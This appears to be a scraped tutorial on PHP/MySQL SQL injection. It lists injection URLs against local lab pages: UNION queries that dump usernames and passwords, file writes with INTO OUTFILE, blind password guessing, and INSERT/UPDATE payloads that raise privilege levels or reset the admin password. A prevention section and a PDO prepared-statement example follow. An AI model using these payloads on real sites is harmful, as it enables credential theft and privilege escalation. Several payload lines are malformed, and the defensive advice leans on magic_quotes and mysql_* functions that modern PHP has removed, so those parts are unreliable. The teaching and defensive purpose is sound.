Php SQL injection implementation (good test code security)

Source: Internet
Author: User
To understand how attackers break into a system, it is worth testing your own PHP code against these techniques before trusting it. The core of SQL injection is constructing SQL statements: only someone who can use SQL flexibly can build (or recognise) an injection string. After finishing the course I wrote these notes so they are ready to use at any time. I assume you have already read the basics of SQL. The code in these notes comes from the web.
=== Basic part ===
Single-table query:
http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m

UNION statement:
http://127.0.0.1/injection/show.php?id=1' union select 1,username,password from user/*
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/*

Export to a file:
http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt
http://127.0.0.1/injection/user.php?username=' or 1=1 into outfile 'c:/file.txt
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt

INSERT statement:
INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1');
Construct the homepage value: http://4ngel.net', '3')#
The SQL statement becomes: INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3')#', '1');

UPDATE statement: I like this one.
First understand this SQL statement:
UPDATE user SET password='md5($password)', homepage='$homepage' WHERE id='$id'
If the statement is altered into any of the following forms, the injection succeeds.
1: Change the homepage value
http://4ngel.net', userlevel='3
Then the SQL statement becomes
UPDATE user SET password='mypass', homepage='http://4ngel.net', userlevel='3' WHERE id='$id'
(userlevel is the user's privilege level.)
2: Change the password value
mypass)' WHERE username='admin'#
Then the SQL statement becomes
UPDATE user SET password='md5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id'
3: Change the id value
' OR username='admin'
Then the SQL statement becomes
UPDATE user SET password='md5($password)', homepage='$homepage' WHERE id='' OR username='admin'

=== Advanced section ===
Common MySQL built-in functions:
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
VERSION()
SUBSTRING()
MID()
CHAR()
LOAD_FILE()
...
Function applications:
UPDATE article SET title=DATABASE() WHERE id=1
http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()
SELECT * FROM user WHERE username=char(97,110,103,101,108)
# char(97,110,103,101,108) is equivalent to 'angel' (decimal ASCII codes)
http://127.0.0.1/injection/user.php?userid=1 and password=char(109,121,112,97,115,115)
http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100)
http://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,111)>

Determine the number and type of fields in the result set:
http://127.0.0.1/injection/show.php?id=-1 union select 1,1
http://127.0.0.1/injection/show.php?id=-1 union select char(97),char(97),char(97)

Guess the table name:
http://127.0.0.1/injection/show.php?id=-1 union select 1,1 from members

Obtain the user name and password with a cross-table query:
http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1 from ymdown_user where id=1

Others:
# Verify the first character of the password
http://127.0.0.1/ymdown/show.php?id=10 union select, 1 from ymdown_user where id=1 and ord(mid(password))=49

=== Injection prevention ===
Server:
Set magic_quotes_gpc to On.
Set display_errors to Off.
Encoding:
$keywords = addslashes($keywords);
$keywords = str_replace('_', '\_', $keywords);
$keywords = str_replace('%', '\%', $keywords);
Numeric type:
Cast the value with intval() before using it.
String type:
Parameters in the SQL statement must be wrapped in single quotation marks.
The following code is used to prevent injection:
if (get_magic_quotes_gpc()) {
    // magic_quotes_gpc has already applied addslashes() to GET/POST/COOKIE data
} else {
    // needs an open connection from the old mysql extension (removed in PHP 7)
    $keywords = mysql_real_escape_string($keywords);
}
// neither magic quotes nor mysql_real_escape_string() touches LIKE wildcards,
// so escape them on both paths, not only in the else branch
$keywords = str_replace('_', '\_', $keywords);
$keywords = str_replace('%', '\%', $keywords);
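The UPDATE from the earlier section and the prevention advice above, worked through in one added PHP example (not code from the original notes): the vulnerable string-built UPDATE beside the same statement with PDO prepared statements, plus the LIKE-wildcard escaping done in front of a bound parameter. Table and column names follow the notes; the connection details, user names and credentials are placeholders.

```php
<?php
// Added example, not from the original notes. Assumes a MySQL table
// `user`(id, username, password, homepage, userlevel) and a PDO connection.

// Vulnerable form: values are pasted into the SQL text, so a homepage value of
//   http://4ngel.net', userlevel='3
// becomes part of the statement and silently raises userlevel, exactly as the
// UPDATE section shows.
function updateProfileVulnerable(PDO $db, string $id, string $password, string $homepage): int
{
    $sql = "UPDATE user SET password='" . md5($password) . "', homepage='$homepage' WHERE id='$id'";
    return $db->exec($sql);
}

// Hardened form: the SQL text is fixed, every value travels as a bound parameter,
// and the id is cast with intval() as the notes recommend.
function updateProfileSafe(PDO $db, string $id, string $password, string $homepage): int
{
    $stmt = $db->prepare('UPDATE user SET password = :password, homepage = :homepage WHERE id = :id');
    $stmt->bindValue(':password', md5($password));   // md5() is the notes' scheme; password_hash() is the modern choice
    $stmt->bindValue(':homepage', $homepage);        // stored literally, quotes and all
    $stmt->bindValue(':id', intval($id), PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// Keyword search: binding alone does not neutralise LIKE wildcards, so the
// _ and % escaping from the notes still belongs in front of the bind.
// MySQL's default LIKE escape character is the backslash.
function searchUsers(PDO $db, string $keywords): array
{
    $like = '%' . addcslashes($keywords, '\\_%') . '%';   // a\_b\% for input a_b%
    $stmt = $db->prepare('SELECT id, username FROM user WHERE username LIKE :kw');
    $stmt->bindValue(':kw', $like);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Placeholder DSN and credentials. Emulated prepares are disabled so the MySQL
// server, not the PHP driver, performs the binding; errors become exceptions
// instead of being echoed to the client (display_errors stays Off).
$db = new PDO('mysql:host=127.0.0.1;dbname=injection;charset=utf8mb4', 'app_user', 'app_password', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);

// The payload from the notes: with binding it is stored as a plain string and
// userlevel is untouched; with the vulnerable function it rewrites the statement.
updateProfileSafe($db, '7', 'mypass', "http://4ngel.net', userlevel='3");
```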
Useful functions:
stripslashes()
get_magic_quotes_gpc()
mysql_real_escape_string()
strip_tags()
array_map()
addslashes()
References:
http://www.4ngel.net/article/36.htm (SQL Injection with MySQL, in Chinese)
http://www.phpe.net/mysql_manual/06-4.html (MySQL statement reference)
